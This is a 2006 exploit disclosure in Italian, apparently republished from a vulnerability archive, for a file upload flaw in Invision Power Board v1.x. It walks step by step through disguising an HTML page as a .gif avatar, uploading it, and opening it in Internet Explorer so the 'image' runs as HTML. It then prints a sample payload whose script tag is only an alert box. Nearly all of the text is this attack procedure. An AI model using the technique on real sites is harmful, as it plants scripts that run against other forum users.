Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11954
HistoryMar 27, 2006 - 12:00 a.m.

IPB v1.x upload html .gif

2006-03-2700:00:00
vulners.com
8

       /      \
    \  \  ,,  /  /
     '-.`\()/`.-'
    .--_'(  )'_--.
   / /` /`""`\ `\ \           * SpiderZ ForumZ Security *
    |  |  ><  |  |
    \  \      /  /
        '.__.'       

=> Autore: SpiderZ
=> IPB v1.x upload html .gif
=> Sito: www.spiderz.tk



Registrati al seguente forum


entra con i tuoi dati


vai su "My Controls"
adesso entra su "Edit Avatar Settings"


prepara la tua pagina "exploit"


salva la tua pag htm in .gif .jpg .png ( usando un semplice editor di testo )


adesso su: ( Upload a new image from your computer ) inserisci la tua .gif ( html )
usando il browser ( firefox )


una volta uppata la gif aprite il sito usando ( Internet explorer )
andate su: "My Controls" - "Edit Avatar Settings"


su: "Your Current Avatar" prelevate il seguente link della vosta gif uppata precedentemente
es: http://www.SITO.com/thoughts/style_avatars/exploit.gif
usando ( internet explorer ) aprite il link della singola img
e vedrete una pag html invece di un file gif

Esempio HTML:


<style type="text/css">
<!–
body {
background-color: #000000;
}
.style1 {
color: #00FF00;
font-weight: bold;
font-family: "Courier New", Courier, monospace;
font-size: 18px;
}
–>
</style>
<div align="center">
<p class="style3"><img src="http://img48.imageshack.us/img48/4090/whosonlinegif0jl.png&quot; width="142" height="220"></p>
<p class="style3 style1">SpiderZ</p>
</div>
<script>alert("=> Exploit by SpiderZ <=")</script>


salva la pagina .GIF

www.spiderz.tk [2006]